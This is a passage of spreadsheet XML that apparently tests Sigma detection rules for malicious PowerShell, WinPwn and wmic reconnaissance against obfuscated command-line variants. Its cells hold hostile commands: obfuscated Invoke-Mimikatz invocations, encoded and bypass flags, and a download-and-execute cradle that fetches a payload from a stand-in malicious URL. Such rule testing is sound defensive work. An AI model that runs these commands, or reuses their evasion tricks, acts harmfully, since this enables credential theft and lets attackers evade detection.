          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I723" s="43" t="n"/>
      <c r="J723" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K723" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="724" ht="15.75" customHeight="1" s="42">
      <c r="A724" s="43" t="n"/>
      <c r="B724" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C724" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D724" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E724" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I724" s="44" t="n"/>
      <c r="J724" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K724" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="725" ht="15.75" customHeight="1" s="42">
      <c r="A725" s="43" t="n"/>
      <c r="B725" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C725" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D725" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E725" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I725" s="43" t="n"/>
      <c r="J725" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K725" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="726" ht="15.75" customHeight="1" s="42">
      <c r="A726" s="43" t="n"/>
      <c r="B726" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C726" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D726" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E726" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I726" s="44" t="n"/>
      <c r="J726" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K726" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="727" ht="15.75" customHeight="1" s="42">
      <c r="A727" s="43" t="n"/>
      <c r="B727" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C727" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D727" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E727" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I727" s="43" t="n"/>
      <c r="J727" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K727" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="728" ht="15.75" customHeight="1" s="42">
      <c r="A728" s="43" t="n"/>
      <c r="B728" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C728" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D728" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E728" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I728" s="43" t="n"/>
      <c r="J728" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K728" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="729" ht="15.75" customHeight="1" s="42">
      <c r="A729" s="43" t="n"/>
      <c r="B729" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C729" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D729" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E729" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I729" s="44" t="n"/>
      <c r="J729" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K729" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="730" ht="15.75" customHeight="1" s="42">
      <c r="A730" s="43" t="n"/>
      <c r="B730" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C730" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D730" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E730" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I730" s="44" t="n"/>
      <c r="J730" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K730" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="731" ht="15.75" customHeight="1" s="42">
      <c r="A731" s="43" t="n"/>
      <c r="B731" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C731" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D731" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E731" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I731" s="44" t="n"/>
      <c r="J731" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K731" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="732" ht="15.75" customHeight="1" s="42">
      <c r="A732" s="43" t="n"/>
      <c r="B732" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C732" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D732" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E732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732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I732" s="43" t="n"/>
      <c r="J732" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K732" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="733" ht="15.75" customHeight="1" s="42">
      <c r="A733" s="43" t="n"/>
      <c r="B733" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C733" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D733" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E733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733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I733" s="43" t="n"/>
      <c r="J733" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K733" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="734" ht="15.75" customHeight="1" s="42">
      <c r="A734" s="43" t="n"/>
      <c r="B734" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C734" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D734" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E734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734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I734" s="44" t="n"/>
      <c r="J734" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K734" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="735" ht="15.75" customHeight="1" s="42">
      <c r="A735" s="43" t="n"/>
      <c r="B735" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C735" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D735" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E735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735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I735" s="43" t="n"/>
      <c r="J735" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K735" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="736" ht="15.75" customHeight="1" s="42">
      <c r="A736" s="43" t="n"/>
      <c r="B736" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C736" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D736" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E736" s="4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736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I736" s="43" t="n"/>
      <c r="J736" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K736" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="737" ht="15.75" customHeight="1" s="42">
      <c r="A737" s="43" t="n"/>
      <c r="B737" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C737" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D737" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E737" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I737" s="43" t="n"/>
      <c r="J737" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K737" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="738" ht="15.75" customHeight="1" s="42">
      <c r="A738" s="43" t="n"/>
      <c r="B738" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C738" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D738" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E738" s="44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738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I738" s="43" t="n"/>
      <c r="J738" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K738" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="739" ht="15.75" customHeight="1" s="42">
      <c r="A739" s="43" t="n"/>
      <c r="B739" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C739" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D739" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E739" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I739" s="44" t="n"/>
      <c r="J739" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K739" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="740" ht="15.75" customHeight="1" s="42">
      <c r="A740" s="43" t="n"/>
      <c r="B740" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C740" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D740" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E740" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I740" s="44" t="n"/>
      <c r="J740" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K740" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="741" ht="15.75" customHeight="1" s="42">
      <c r="A741" s="43" t="n"/>
      <c r="B741" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C741" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D741" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E741" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I741" s="44" t="n"/>
      <c r="J741" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K741" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="742" ht="15.75" customHeight="1" s="42">
      <c r="A742" s="43" t="n"/>
      <c r="B742" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C742" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D742" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E742" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I742" s="44" t="n"/>
      <c r="J742" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K742" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="743" ht="15.75" customHeight="1" s="42">
      <c r="A743" s="43" t="n"/>
      <c r="B743" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C743" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D743" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E743" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I743" s="44" t="n"/>
      <c r="J743" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K743" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="744" ht="15.75" customHeight="1" s="42">
      <c r="A744" s="43" t="n"/>
      <c r="B744" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C744" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D744" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E744" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I744" s="43" t="n"/>
      <c r="J744" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K744" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="745" ht="15.75" customHeight="1" s="42">
      <c r="A745" s="43" t="n"/>
      <c r="B745" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C745" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D745" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E745" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F745" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G745" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H745" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I745" s="43" t="n"/>
      <c r="J745" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K745" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="746" ht="15.75" customHeight="1" s="42">
      <c r="A746" s="44" t="n"/>
      <c r="B746" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C746" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D746" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E746" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I746" s="43" t="n"/>
      <c r="J746" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K746" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="747" ht="15.75" customHeight="1" s="42">
      <c r="A747" s="44" t="n"/>
      <c r="B747" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C747" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D747" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E747" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I747" s="43" t="n"/>
      <c r="J747" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K747" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="748" ht="15.75" customHeight="1" s="42">
      <c r="A748" s="44" t="n"/>
      <c r="B748" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C748" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D748" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E748" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I748" s="44" t="n"/>
      <c r="J748" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K748" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="749" ht="15.75" customHeight="1" s="42">
      <c r="A749" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B749" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C749" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D749" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E749" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I749" s="43" t="n"/>
      <c r="J749" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K749" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="750" ht="15.75" customHeight="1" s="42">
      <c r="A750" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B750" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C750" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D750" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E750" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I750" s="43" t="n"/>
      <c r="J750" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K750" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="751" ht="15.75" customHeight="1" s="42">
      <c r="A751" s="44" t="n"/>
      <c r="B751" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C751" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D751" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E751" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /Namespace:\root\CIMV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I751" s="43" t="n"/>
      <c r="J751" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K751" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="752" ht="15.75" customHeight="1" s="42">
      <c r="A752" s="44" t="n"/>
      <c r="B752" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C752" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D752" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E752" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /nAmEspACe:\rooT\CImv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I752" s="43" t="n"/>
      <c r="J752" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K752" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="753" ht="15.75" customHeight="1" s="42">
      <c r="A753" s="44" t="n"/>
      <c r="B753" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C753" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D753" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E753" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /nAmESPACE:\root\cimv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F753" s="44" t="b">
        <v>0</v>
      </c>
